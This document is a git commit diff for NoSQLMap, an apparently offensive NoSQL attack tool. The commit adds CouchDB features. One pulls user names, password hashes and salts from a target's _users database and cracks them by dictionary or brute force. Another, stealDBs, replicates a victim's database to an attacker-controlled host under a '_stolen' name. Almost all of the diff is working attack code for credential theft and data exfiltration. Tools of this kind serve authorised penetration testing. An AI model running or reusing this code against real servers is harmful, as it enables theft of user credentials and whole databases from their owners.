Add Couch password cracker

tcstool · tcstool · commit b42f48fc1e9e · 2014-09-15T14:10:51.000-05:00
diff --git a/nosqlmap.py b/nosqlmap.py
@@ -206,7 +206,7 @@ def options():
 		print "4-Toggle HTTPS (Current: " + str(https) + ")"
 		print "5-Set " + platform + " Port (Current : " + str(dbPort) + ")"
 		print "6-Set HTTP Request Method (GET/POST) (Current: " + httpMethod + ")"
-		print "7-Set my local Mongo/Shell IP (Current: " + str(myIP) + ")"
+		print "7-Set my local " +  platform + "/Shell IP (Current: " + str(myIP) + ")"
 		print "8-Set shell listener port (Current: " + str(myPort) + ")"
 		print "9-Toggle Verbose Mode: (Current: " + str(verb) + ")"
 		print "0-Load options file"
@@ -308,7 +308,7 @@ def options():
 			goodLen = False
 			goodDigits = False
 			while optionSet[4] == False:
-				myIP = raw_input("Enter the host IP for my Mongo/Shells: ")
+				myIP = raw_input("Enter the host IP for my " + platform +"/Shells: ")
 				#make sure we got a valid IP
 				octets = myIP.split(".")
 				#If there aren't 4 octets, toss an error.
diff --git a/nsmcouch.py b/nsmcouch.py
@@ -16,8 +16,17 @@
 
 
 import couchdb
-import urllib
+import requests
+import sys
+import string
+import itertools
+from hashlib import sha1
+
 global dbList
+global yes_tag
+global no_tag
+yes_tag = ['y', 'Y']
+no_tag = ['n', 'N']
 
 def couchScan(target,port,pingIt):
     if pingIt == True:
@@ -117,7 +126,7 @@ def netAttacks(target,port, myIP):
         while mgtSelect:
             print "\n"
             print "1-Get Server Version and Platform"
-            print "2-Enumerate Databases/Collections/Users"
+            print "2-Enumerate Databases/Users/Password Hashes"
             print "3-Check for Attachments"
             print "4-Clone a Database"
             print "5-Return to Main Menu"
@@ -129,17 +138,13 @@ def netAttacks(target,port, myIP):
                 
             if attack == "2":
                 print "\n"
-                enumDbs(conn)
+                enumDbs(conn,target)
 
             if attack == "3":
                 print "\n"
                 enumGrid(conn)
                 
             if attack == "4":
-                if optionSet[4] == False:
-                    print "Target database not set!"
-
-                else:
                     print "\n"
                     stealDBs(myIP,conn)
 
@@ -149,37 +154,187 @@ def netAttacks(target,port, myIP):
 def getPlatInfo(couchConn, target):
     print "Server Info:"
     print "CouchDB Version: " + couchConn.version()
-    print "Configuration File:\n"
-    print urllib.urlopen("http://" + target + ":5984/_config").read()
-    print "\n"
     return
     
-def enumDbs (couchConn):
-    global dbList
+def enumDbs (couchConn,target):
     dbList = []
+    userNames = []
+    userHashes = []
+    userSalts = []
     try:
             for db in couchConn:
                  dbList.append(db)
+            
                  
             print "List of databases:"
             print "\n".join(dbList)
             print "\n"
-            return #debug
             
     except:
             print "Error:  Couldn't list databases.  The provided credentials may not have rights."
 
-    if '_users' in dbList():
-		    users = list(db.system.users.find())
-                    print "Database Users and Password Hashes:"
+    if '_users' in dbList:
+        r = requests.get("http://" + target + ":5984/_users/_all_docs?startkey=\"org.couchdb.user\"&include_docs=true")
+        userDict = r.json() 
+        
+        for counter in range (0,int(userDict["total_rows"])-int(userDict["offset"])):
+            userNames.append(userDict["rows"][counter]["id"].split(":")[1])
+            userHashes.append(userDict["rows"][counter]["doc"]["password_sha"])
+            userSalts.append(userDict["rows"][counter]["doc"]["salt"])
+        
+        print "Database Users and Password Hashes:"
+        
+        for x in range(0,len(userNames)):
+            print "Username: " + userNames[x]
+            print "Hash: " + userHashes[x]
+            print "Salt: "+ userSalts[x]
+            print "\n"
+            
+            crack = raw_input("Crack this hash (y/n)? ")
+            
+            if crack in yes_tag:
+                passCrack(userNames[x],userHashes[x],userSalts[x])
+
+        
+    return
+
+def stealDBs (myDB, couchConn):
+    dbLoot = True
+    menuItem = 1
+    dbList = []
+    
+    for db in couchConn:
+        dbList.append(db)
+    
+    if len(dbList) == 0:
+        print "Can't get a list of databases to steal.  The provided credentials may not have rights."
+        return
+    
+    for dbName in dbList:
+        print str(menuItem) + "-" + dbName
+        menuItem += 1
+    
+    while dbLoot:
+        dbLoot = raw_input("Select a database to steal:")
+        
+        if int(dbLoot) > menuItem:
+            print "Invalid selection."
+
+        else:
+            break
+        
+    try:
+        print dbList[int(dbLoot)-1] #debug
+        print "http://" + myDB + ":5984/" + dbList[int(dbLoot)-1] + "_stolen" #debug
+        couchConn.replicate(dbList[int(dbLoot)-1],"http://" + myDB + ":5984/" + dbList[int(dbLoot)-1] + "_stolen")
+        
+        cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
+        
+        if cloneAnother in yes_tag:
+            stealDBs(myDB,couchConn)
+
+        else:
+            return
+
+    except Exception, e:
+        print e #Debug
+        raw_input ("Something went wrong.  Are you sure your CouchDB is running and options are set? Press enter to return...")
+        return
+    
+def passCrack (user, encPass, salt):
+    select = True
+    print "Select password cracking method: "
+    print "1-Dictionary Attack"
+    print "2-Brute Force"
+    print "3-Exit"
+
+    while select:
+            select = raw_input("Selection: ")
+
+            if select == "1":
+                select = False
+                dict_pass(encPass,salt)
+                
+            elif select == "2":
+                    select = False
+                    brute_pass(encPass,salt)
+
+            elif select == "3":
+                    return
+    return
+
+def genBrute(chars, maxLen):
+    return (''.join(candidate) for candidate in itertools.chain.from_iterable(itertools.product(chars, repeat=i) for i in range(1, maxLen + 1)))
+
+def brute_pass(hashVal,salt):
+    charSel = True
+    print "\n"
+    maxLen = raw_input("Enter the maximum password length to attempt: ")
+    print "1-Lower case letters"
+    print "2-Upper case letters"
+    print "3-Upper + lower case letters"
+    print "4-Numbers only"
+    print "5-Alphanumeric (upper and lower case)"
+    print "6-Alphanumeric + special characters"
+    charSel = raw_input("\nSelect character set to use:")
+
+    if charSel == "1":
+        chainSet = string.ascii_lowercase
+
+    elif charSel == "2":
+        chainSet= string.ascii_uppercase
+
+    elif charSel == "3":
+        chainSet = string.ascii_letters
+        
+    elif charSel == "4":
+        chainSet = string.digits
 
-                    for x in range (0,len(users)):
-                        print "Username: " + users[x]['user']
-                        print "Hash: " + users[x]['pwd']
-                        print "\n"
-                        crack = raw_input("Crack this hash (y/n)? ")
+    elif charSel == "5":
+        chainSet = string.ascii_letters + string.digits
+
+    elif charSel == "6":
+        chainSet = string.ascii_letters + string.digits + "!@#$%^&*()-_+={}[]|~`':;<>,.?/"
+
+    count = 0
+    print "\n",
+
+    for attempt in genBrute (chainSet,int(maxLen)):
+        print "\rCombinations tested: " + str(count) + "\r"
+        count += 1
+        if sha1(attempt+salt).hexdigest() == hashVal:
+                print "Found - "+attempt 
+                return
+
+def dict_pass(key,salt):
+    loadCheck = False
+    
+    while loadCheck == False:
+        dictionary = raw_input("Enter path to password dictionary: ")
+        
+        try:
+            with open (dictionary) as f:
+                passList = f.readlines()
+                loadCheck = True
+
+        except:
+            print " Couldn't load file."
+
+    print "Running dictionary attack..."
+    
+    for passGuess in passList:
+        temp = passGuess.split("\n")[0]
+        gotIt = gen_pass_couch(temp,salt,key)
+        
+        if gotIt == True:
+            break
 
-			if crack in yes_tag:
-			    passCrack(users[x]['user'],users[x]['pwd'])
     return
 
+def gen_pass_couch(passw, salt, hashVal):
+    if sha1(passw+salt).hexdigest() == hashVal:
+        print "Found - "+passw
+        return True
+        
+    else:
+        return False
diff --git a/nsmmongo.py b/nsmmongo.py
@@ -151,7 +151,7 @@ def stealDBs(myDB,victim,mongoConn):
 		menuItem += 1
 	
 	while dbLoot:
-		dbLoot = raw_input("Select a database to steal:")
+		dbLoot = raw_input("Select a database to steal: ")
 		
 		if int(dbLoot) > menuItem:
 			print "Invalid selection."
@@ -174,12 +174,12 @@ def stealDBs(myDB,victim,mongoConn):
 		
 		else:
 			raw_input("Invalid Selection.  Press enter to continue.")
-			stealDBs(myDB)
+			stealDBs(myDB,victim,mongoConn)
 			
 		cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
 		
 		if cloneAnother in yes_tag:
-			stealDBs(myDB)
+			stealDBs(myDB,victim,mongoConn)
 		
 		else:
 			return
